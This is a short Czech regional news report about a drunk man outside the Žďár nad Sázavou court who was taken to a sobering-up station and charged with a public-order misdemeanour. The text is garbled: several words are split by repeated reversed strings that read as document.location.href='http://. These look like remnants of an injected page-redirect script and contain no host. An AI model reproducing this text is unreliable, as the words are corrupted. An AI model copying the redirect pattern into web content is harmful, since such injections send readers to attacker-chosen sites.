Rainbow page separator

Opilec budil veřejné pohoršení, skončil na záchytce

Sobota, 25. srpna 2018

Policejní auto, policie, měření rychlosti

Žďár nad Sázavou / Veřejné pohoršení budil v úterý dopoledne před budovou žďárského soudu muž, na něhož pak kolemjdoucí přivolali policejní hlídku.
„Žďárští policisté vyjížděli k budově okresního soudu, kde se pohyboval zjevně opilý muž, který tam hlasitě pokřikoval vulgární výrazy. Přivolaní policisté na místě hříšníka z[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožnili jako čtyřiatřicetiletého muže ze Žďárska,“ potvrdil David Linhart z oddělení tisku a prevence Krajského ředitelství policie Kraje Vysočina.
Policisté u muže provedli zkoušku na zjištění pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnosti alkoholu v dechu, která byla pozitivní a jejíž výsledek činil téměř dvě promile. „Jelikož muž svým jednáním budil veřejné pohoršení, tak jej policisté zajistili a převezli do protialkoholní záchytné stanice k vystřízlivění. Poté případ zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali jako přestupek proti veřejnému pořádku, za který muži ve správním řízení hrozí několikatisícová pokuta,“ dodal David Linhart.